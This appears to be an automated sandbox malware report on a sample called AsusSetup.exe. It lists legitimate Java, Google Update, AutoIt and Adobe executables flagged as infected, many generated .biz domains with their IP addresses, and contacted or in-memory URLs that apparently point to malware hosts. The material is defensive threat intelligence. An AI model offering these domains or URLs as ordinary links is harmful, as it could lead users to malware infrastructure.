C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Check.exe100%Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe100%Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe100%Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.openssl.org/support/faq.html0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
uaafd.biz
3.254.94.185
truefalse
    		unknown
    vjaxhpbji.biz
    		82.112.184.197
    		truefalse
      		unknown
      pywolwnvd.biz
      		54.244.188.177
      		truefalse
        		unknown
        ytctnunms.biz
        		3.94.10.34
        		truefalse
          		unknown
          lrxdmhrr.biz
          		54.244.188.177
          		truefalse
            		unknown
            vrrazpdh.biz
            		34.211.97.45
            		truetrue
              		unknown
              ctdtgwag.biz
              		3.94.10.34
              		truefalse
                		unknown
                cikivjto.biz
                		18.246.231.120
                		truefalse
                  		unknown
                  tbjrpv.biz
                  		34.246.200.160
                  		truefalse
                    		unknown
                    hehckyov.biz
                    		44.221.84.105
                    		truefalse
                      		unknown
                      xlfhhhm.biz
                      		47.129.31.212
                      		truefalse
                        		unknown
                        warkcdu.biz
                        		18.141.10.107
                        		truetrue
                          		unknown
                          npukfztj.biz
                          		44.221.84.105
                          		truefalse
                            		unknown
                            sxmiywsfv.biz
                            		13.251.16.150
                            		truefalse
                              		unknown
                              przvgke.biz
                              		172.234.222.143
                              		truefalse
                                		unknown
                                dwrqljrr.biz
                                		54.244.188.177
                                		truefalse
                                  		unknown
                                  ocsvqjg.biz
                                  		3.254.94.185
                                  		truefalse
                                    		unknown
                                    ecxbwt.biz
                                    		54.244.188.177
                                    		truefalse
                                      		unknown
                                      gytujflc.biz
                                      		208.100.26.245
                                      		truefalse
                                        		unknown
                                        bghjpy.biz
                                        		34.211.97.45
                                        		truetrue
                                          		unknown
                                          damcprvgv.biz
                                          		18.208.156.248
                                          		truefalse
                                            		unknown
                                            gvijgjwkh.biz
                                            		3.94.10.34
                                            		truefalse
                                              		unknown
                                              gnqgo.biz
                                              		18.208.156.248
                                              		truefalse
                                                		unknown
                                                deoci.biz
                                                		18.208.156.248
                                                		truefalse
                                                  		unknown
                                                  iuzpxe.biz
                                                  		13.251.16.150
                                                  		truefalse
                                                    		unknown
                                                    nqwjmb.biz
                                                    		35.164.78.200
                                                    		truefalse
                                                      		unknown
                                                      wllvnzb.biz
                                                      		18.141.10.107
                                                      		truetrue
                                                        		unknown
                                                        kvbjaur.biz
                                                        		54.244.188.177
                                                        		truefalse
                                                          		unknown
                                                          cvgrf.biz
                                                          		54.244.188.177
                                                          		truefalse
                                                            		unknown
                                                            lpuegx.biz
                                                            		82.112.184.197
                                                            		truefalse
                                                              		unknown
                                                              bumxkqgxu.biz
                                                              		44.221.84.105
                                                              		truefalse
                                                                		unknown
                                                                yhqqc.biz
                                                                		34.211.97.45
                                                                		truetrue
                                                                  		unknown
                                                                  vcddkls.biz
                                                                  		18.141.10.107
                                                                  		truetrue
                                                                    		unknown
                                                                    vyome.biz
                                                                    		18.246.231.120
                                                                    		truefalse
                                                                      		unknown
                                                                      dlynankz.biz
                                                                      		85.214.228.140
                                                                      		truefalse
                                                                        		unknown
                                                                        gcedd.biz
                                                                        		13.251.16.150
                                                                        		truefalse
                                                                          		unknown
                                                                          reczwga.biz
                                                                          		44.221.84.105
                                                                          		truefalse
                                                                            		unknown
                                                                            xccjj.biz
                                                                            		18.246.231.120
                                                                            		truefalse
                                                                              		unknown
                                                                              wxgzshna.biz
                                                                              		72.52.178.23
                                                                              		truefalse
                                                                                		unknown
                                                                                oshhkdluh.biz
                                                                                		54.244.188.177
                                                                                		truefalse
                                                                                  		unknown
                                                                                  opowhhece.biz
                                                                                  		18.208.156.248
                                                                                  		truefalse
                                                                                    		unknown
                                                                                    pectx.biz
                                                                                    		18.246.231.120
                                                                                    		truefalse
                                                                                      		unknown
                                                                                      jwkoeoqns.biz
                                                                                      		18.208.156.248
                                                                                      		truefalse
                                                                                        		unknown
                                                                                        jpskm.biz
                                                                                        		34.211.97.45
                                                                                        		truetrue
                                                                                          		unknown
                                                                                          ftxlah.biz
                                                                                          		47.129.31.212
                                                                                          		truefalse
                                                                                            		unknown
                                                                                            ifsaia.biz
                                                                                            		13.251.16.150
                                                                                            		truefalse
                                                                                              		unknown
                                                                                              rynmcq.biz
                                                                                              		54.244.188.177
                                                                                              		truefalse
                                                                                                		unknown
                                                                                                fjumtfnz.biz
                                                                                                		34.211.97.45
                                                                                                		truetrue
                                                                                                  		unknown
                                                                                                  oflybfv.biz
                                                                                                  		47.129.31.212
                                                                                                  		truefalse
                                                                                                    		unknown
                                                                                                    jhvzpcfg.biz
                                                                                                    		44.221.84.105
                                                                                                    		truefalse
                                                                                                      		unknown
                                                                                                      ywffr.biz
                                                                                                      		54.244.188.177
                                                                                                      		truefalse
                                                                                                        		unknown
                                                                                                        tnevuluw.biz
                                                                                                        		35.164.78.200
                                                                                                        		truefalse
                                                                                                          		unknown
                                                                                                          saytjshyf.biz
                                                                                                          		44.221.84.105
                                                                                                          		truefalse
                                                                                                            		unknown
                                                                                                            fwiwk.biz
                                                                                                            		172.234.222.138
                                                                                                            		truefalse
                                                                                                              		unknown
                                                                                                              rrqafepng.biz
                                                                                                              		47.129.31.212
                                                                                                              		truefalse
                                                                                                                		unknown
                                                                                                                typgfhb.biz
                                                                                                                		13.251.16.150
                                                                                                                		truefalse
                                                                                                                  		unknown
                                                                                                                  esuzf.biz
                                                                                                                  		34.211.97.45
                                                                                                                  		truetrue
                                                                                                                    		unknown
                                                                                                                    eufxebus.biz
                                                                                                                    		18.141.10.107
                                                                                                                    		truetrue
                                                                                                                      		unknown
                                                                                                                      whjovd.biz
                                                                                                                      		18.141.10.107
                                                                                                                      		truetrue
                                                                                                                        		unknown
                                                                                                                        uphca.biz
                                                                                                                        		44.221.84.105
                                                                                                                        		truefalse
                                                                                                                          		unknown
                                                                                                                          htwqzczce.biz
                                                                                                                          		172.234.222.138
                                                                                                                          		truefalse
                                                                                                                            		unknown
                                                                                                                            xyrgy.biz
                                                                                                                            		18.208.156.248
                                                                                                                            		truefalse
                                                                                                                              		unknown
                                                                                                                              banwyw.biz
                                                                                                                              		44.221.84.105
                                                                                                                              		truefalse
                                                                                                                                		unknown
                                                                                                                                myups.biz
                                                                                                                                		165.160.15.20
                                                                                                                                		truefalse
                                                                                                                                  		unknown
                                                                                                                                  pwlqfu.biz
                                                                                                                                  		34.246.200.160
                                                                                                                                  		truefalse
                                                                                                                                    		unknown
                                                                                                                                    zyiexezl.biz
                                                                                                                                    		18.208.156.248
                                                                                                                                    		truefalse
                                                                                                                                      		unknown
                                                                                                                                      yauexmxk.biz
                                                                                                                                      		18.208.156.248
                                                                                                                                      		truefalse
                                                                                                                                        		unknown
                                                                                                                                        hlzfuyy.biz
                                                                                                                                        		34.211.97.45
                                                                                                                                        		truetrue
                                                                                                                                          		unknown
                                                                                                                                          ssbzmoy.biz
                                                                                                                                          		18.141.10.107
                                                                                                                                          		truetrue
                                                                                                                                            		unknown
                                                                                                                                            knjghuig.biz
                                                                                                                                            		18.141.10.107
                                                                                                                                            		truetrue
                                                                                                                                              		unknown
                                                                                                                                              yunalwv.biz
                                                                                                                                              		208.100.26.245
                                                                                                                                              		truefalse
                                                                                                                                                		unknown
                                                                                                                                                brsua.biz
                                                                                                                                                		3.254.94.185
                                                                                                                                                		truefalse
                                                                                                                                                  		unknown
                                                                                                                                                  rffxu.biz
                                                                                                                                                  		34.246.200.160
                                                                                                                                                  		truefalse
                                                                                                                                                    		unknown
                                                                                                                                                    jlqltsjvh.biz
                                                                                                                                                    		18.141.10.107
                                                                                                                                                    		truetrue
                                                                                                                                                      		unknown
                                                                                                                                                      mgmsclkyu.biz
                                                                                                                                                      		34.246.200.160
                                                                                                                                                      		truefalse
                                                                                                                                                        		unknown
                                                                                                                                                        gjogvvpsf.biz
                                                                                                                                                        		208.100.26.245
                                                                                                                                                        		truefalse
                                                                                                                                                          		unknown
                                                                                                                                                          qaynky.biz
                                                                                                                                                          		13.251.16.150
                                                                                                                                                          		truefalse
                                                                                                                                                            		unknown
                                                                                                                                                            qpnczch.biz
                                                                                                                                                            		18.246.231.120
                                                                                                                                                            		truefalse
                                                                                                                                                              		unknown
                                                                                                                                                              mnjmhp.biz
                                                                                                                                                              		47.129.31.212
                                                                                                                                                              		truefalse
                                                                                                                                                                		unknown
                                                                                                                                                                acwjcqqv.biz
                                                                                                                                                                		18.141.10.107
                                                                                                                                                                		truetrue
                                                                                                                                                                  		unknown
                                                                                                                                                                  jdhhbs.biz
                                                                                                                                                                  		13.251.16.150
                                                                                                                                                                  		truefalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    zrlssa.biz
                                                                                                                                                                    		44.221.84.105
                                                                                                                                                                    		truefalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      anpmnmxo.biz
                                                                                                                                                                      		unknown
                                                                                                                                                                      		unknowntrue
                                                                                                                                                                        		unknown
                                                                                                                                                                        zjbpaao.biz
                                                                                                                                                                        		unknown
                                                                                                                                                                        		unknowntrue
                                                                                                                                                                          		unknown
                                                                                                                                                                          uhxqin.biz
                                                                                                                                                                          		unknown
                                                                                                                                                                          		unknowntrue
                                                                                                                                                                            		unknown
                                                                                                                                                                            zlenh.biz
                                                                                                                                                                            		unknown
                                                                                                                                                                            		unknowntrue
                                                                                                                                                                              		unknown
                                                                                                                                                                              muapr.biz
                                                                                                                                                                              		unknown
                                                                                                                                                                              		unknowntrue
                                                                                                                                                                                		unknown
                                                                                                                                                                                lejtdj.biz
                                                                                                                                                                                		unknown
                                                                                                                                                                                		unknowntrue
                                                                                                                                                                                  		unknown

                                                                                                                                                                                  Contacted URLs

                                                                                                                                                                                  NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                  http://dwrqljrr.biz/arnrrfwlvkgxeufdfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    http://bumxkqgxu.biz/wfwpkfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      http://pywolwnvd.biz/fnkotvtiwfwjvbkyfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        http://htwqzczce.biz/raodtfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://ssbzmoy.biz/spoyvitrue
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            http://jpskm.biz/cmntnmriuwtrue
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              http://gjogvvpsf.biz/yvsxvdpybfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                http://yhqqc.biz/aonsotltrue
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  http://zrlssa.biz/vhkxrtpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    http://esuzf.biz/fvsaltcygktrue
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://vcddkls.biz/wstrue
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        http://pywolwnvd.biz/tqhhuuvdfalse
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://oflybfv.biz/mhxqlifalse
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://iuzpxe.biz/ttxmcyeqtafalse
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://fwiwk.biz/mjmfrcmnofalse
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://npukfztj.biz/rdbyhsstwxrfalse
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  http://tbjrpv.biz/cxtfkubsyhrifalse
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    http://yunalwv.biz/nmaggyamfalse
                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                      http://hehckyov.biz/lpoacfalse
                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                        http://yauexmxk.biz/kjptihfalse
                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                          http://whjovd.biz/gcptrue
                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                            http://rffxu.biz/yamkuqcyqisosmtqfalse
                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                              http://tnevuluw.biz/awkwgthegytbtgpcfalse
                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                http://qpnczch.biz/akhgyldyrjfalse
                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                  http://ecxbwt.biz/wfalse
                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                    http://kvbjaur.biz/xfalse
                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                      http://damcprvgv.biz/fvfalse
                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                        http://fwiwk.biz/yhrktnvbmfalse
                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                          http://uphca.biz/yfvdkcwfalse
                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                            http://npukfztj.biz/ywrwbyxrsfalse
                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                              http://fjumtfnz.biz/yjhdmcatglnakdtrue
                                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                                http://ytctnunms.biz/dneetrunpbgfalse
                                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                                  http://warkcdu.biz/pmpevwipwdmvqitrue
                                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                                    http://vyome.biz/ckhsjhaxaevpxtdfalse
                                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                                      http://gytujflc.biz/mmdfpfalse
                                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                                        http://przvgke.biz/uyurjsjwfnxwfalse
                                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                                          http://rrqafepng.biz/lufcjqrcfalse
                                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                                            http://jhvzpcfg.biz/vbtgsklxqvscfalse
                                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                                              http://uaafd.biz/yefjfsfalse
                                                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                                                http://ftxlah.biz/jkvhfxewyayfhgfalse
                                                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                                                  http://xccjj.biz/bbxfalse
                                                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                                                    http://eufxebus.biz/xodwswpgarjchsqytrue
                                                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                                                      http://eufxebus.biz/kwcvpyammkduugrtrue
                                                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                                                        http://hlzfuyy.biz/mtrue
                                                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                                                          http://xyrgy.biz/gsepgksfalse
                                                                                                                                                                                                                                                                            		unknown

                                                                                                                                                                                                                                                                            URLs from Memory and Binaries

                                                                                                                                                                                                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                                                                            http://18.246.231.120/ckhsjhaxaevpxtdalg.exe, 00000002.00000003.2288078028.000000000056B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                                                              http://13.251.16.150/ttxmcyeqtaalg.exe, 00000002.00000003.2314597363.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2315969430.000000000056B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                                                                http://18.141.10.107/Jalg.exe, 00000002.00000003.1740350892.000000000050C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1738763339.000000000050C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                                                                  http://54.244.188.177:80/ynAsusSetup.exe, 00000000.00000003.1738814075.00000000005BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                                                                    http://13.251.16.150/xndhuecwgokoeqkOalg.exe, 00000002.00000003.2334093513.000000000056B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2331458279.000000000055E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                                                                      http://18.246.231.120/alg.exe, 00000002.00000003.2288526929.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2289940896.000000000055E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                                                                        http://18.141.10.107/6alg.exe, 00000002.00000003.1740350892.000000000050C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1738763339.000000000050C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                                                                          http://54.244.188.177/mrsvwgseskwgtcOalg.exe, 00000002.00000003.2223285252.000000000052D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                                                                            http://18.141.10.107:80/qmxhsynpsalg.exe, 00000002.00000003.1791243483.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1793031401.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                                                                              http://44.221.84.105:80/ywkdmkysrijolmojPalg.exe, 00000002.00000003.2069250906.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2088524007.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2053760882.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2080435303.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2037434352.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                                                                                http://34.211.97.45:80/yyjnpedbclalg.exe, 00000002.00000003.2343746769.000000000054C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2347309628.000000000054C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2364566236.000000000054C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                                                                                  http://18.141.10.107/.alg.exe, 00000002.00000003.1738763339.000000000050C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                                                                                    http://165.160.15.20:80/euqwoqqatalg.exe, 00000002.00000003.2223981210.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2213279383.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2241493433.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2242965828.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2177767483.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2240825317.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2223285252.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2212486448.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2189192585.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2178627316.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2199212734.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2188489063.000000000054B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                                                                                      http://47.129.31.212:80/shmalg.exe, 00000002.00000003.2014132101.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2013455899.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2030058504.0000000000548000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2029468928.0000000000548000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2037434352.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2012540214.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                                                                                        http://es5.github.io/#x15.4.4.21jucheck.exe.2.drfalse
                                                                                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                                                                                          http://44.221.84.105/ywrwbyxrsHAsusSetup.exe, 00000000.00000003.1739817164.0000000000579000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742470565.0000000000582000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1740569192.0000000000581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                                                                                            http://44.221.84.105/rdbyhsstwxralg.exe, 00000002.00000003.1761654612.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1761362905.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1760951972.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                                                                                              http://35.164.78.200:80/ckfgkmbjfmpkxgrrobatalg.exe, 00000002.00000003.2156726854.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2157221824.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2174197488.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2166050081.0000000000549000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2174993099.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2165632802.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2157885847.0000000000549000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                                                                                                http://44.221.84.105/AsusSetup.exe, 00000000.00000003.1740569192.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742470565.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1739817164.0000000000579000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742470565.0000000000582000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1740569192.0000000000581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                                                                                                  http://54.244.188.177:80/mrsvwgseskwgtcPalg.exe, 00000002.00000003.2251645473.000000000054A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2223981210.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2241493433.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2242965828.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2240825317.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2223285252.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2250640541.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                                                                                                    http://18.208.156.248/kjptihxaealg.exe, 00000002.00000003.2297664330.000000000056B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                                                                                                      http://47.129.31.212/Balg.exe, 00000002.00000003.2013243358.000000000050C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                                                                                                        http://18.141.10.107/spoyviAsusSetup.exe, 00000000.00000003.1738814075.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1728259362.00000000005AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                                                                                                          https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/filterjucheck.exe.2.drfalse
                                                                                                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                                                                                                            http://34.246.200.160:80/cxtfkubsyhrialg.exe, 00000002.00000003.2115106603.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2123146582.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2088524007.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2098701280.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2080435303.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2097510796.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                                                                                                              http://java.sun.comnotjucheck.exe.2.drfalse
                                                                                                                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                                                                                                                https://javadl-esd-secure.oracle.com/update/%s/map-%s.xmljucheck.exe.2.drfalse
                                                                                                                                                                                                                                                                                                                                  		unknown
